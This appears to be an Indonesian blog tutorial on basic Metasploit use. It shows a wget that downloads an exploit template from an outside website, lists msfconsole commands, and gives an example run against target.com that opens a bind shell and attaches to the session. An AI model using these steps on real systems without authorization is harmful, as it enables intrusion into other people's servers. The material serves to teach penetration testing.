Dasar Metasploit

chmood

Dasar Metasploit


Assalamu'alaikum . ^_^


Sebelum nya ini tulisan sudah 2 bulan yang lalu karena Data udah ilang bersama FD ilang dan data hilang bersama instal ulang komputer karena data tidak di back up :(
Saya menulis ini kembali ya walaupun mungkin dengan tulisan 2 bulan yang lalu .
Di sini / dalam tulisan ini saya menjelaskan tentang dasar metasploit , di sini saya menjelaskan hanya dasar karena saya juga masih belajar ^_^

Langsung saja ya karena mungkin teman-teman sudah tahu apa itu metasploit . ^_^

Untuk menjalankan metasploit pertama kali nya ada beberapa set up yang harus dilakukan untuk melakukan eksploitasi atau yang biasa di sebut penetrasi kalau g' salah ^_^
Hal pertama yang harus di lakukan membuat direktori dalam melakukan eksploitasi tersebut,perintah direktori tersebut bisa sebagai berikut ^_^

mkdir -p ~/.msf3/modules/exploits/



Di sini saya menyediakan contoh untuk melakukan sebuah eksploitasi, yang di gunakan sebagai template untuk mengeksploitasi nya .
Comand yang di gunakan untuk mendownload nya bisa sebagai berikut ,

cd ~/.msf3/modules/exploits/ wget http://wemetlastnite.com/pics/xmple.rbΒ 



Wget di sini adalah di rektori di mana file tersebut di simpan , yuk lanjut lagi ^_^
Yupz setelah perintah di atas selesai sekarang metasploit siap di gunakan untuk melakukan eksploit nya . sikak coyyyyyyy
Setelah semua sudah siap untuk memulai konsole, cukup menjalankan msfconsole.

Nah sebelum melakukan sebuah eksploitasi di bawah ini adalah comand / perintah yang sering di gunakan Metasploit ^_^ :

1. use exploitname
Nama exploit yang di gunakan dalam exploit metasploit tersebut.
2. set RHOST hostname_or_ip
Untuk mengetahui atau menginstuksikan target lewat remote host atau Ip target ^_^ .
3. set RPORT host_port
Untuk mengatur port yang terhubung lewat temote host ke target tersebut.
4. set PAYLOAD linux/x86/shell_bind_tcp
Mengatur payload yang di gunakan lewat platform Linux x86 ke sebuah target ketika shell sudah terpasang.
5. set LPORT local_port
Menetapkan port di server yang akan di xploit atau target ^_^ .
6. exploit / rexploit
Memanfaatkan kode dari web yang telah di eksekusi , Yupz reload exploit / rexploit memungkinkan perubahan kecil tanpa harus retart konsole tersebut.
7. sessions
Ini untuk membantu agar kita bisa berinteraksi dengan berbagai remote shell yang sudah kita tanam di target / server.
8. show options
Untuk mengatur exploit dan payload , show exploits dan show payloads juga dapat menampilkan exploit / payload yang telah di eksekusi.
9. help
Akan memberikan informasi tentang perintah-perintah yang tidak di sebutkan di atas . ^_^

Di bawah ini saya akan memberikan contoh exploit attack target.com menggunakan port 3000 dengan shell_bind_tcp payload.
Bila berhasil maka akan membuka port 9485 dan metasploit akan menunjukk shell di dalam web target yang telah di exploit ^_^ .

use example
set RHOST target.com
set RPORT 3000
set PAYLOAD linux/x86/shell_bind_tcp
set LPORT 9485
exploit



Nah kalau pada metasploit 3.1, dua perintah berikut akan memungkinkan kita untuk bermain / berinteraksi dengan shell yang sudah tertanam.

sessions -l
sessions -i 1



Sekian Penjelasan dari dasar metasploit ,Β 


Thanks :


Komentar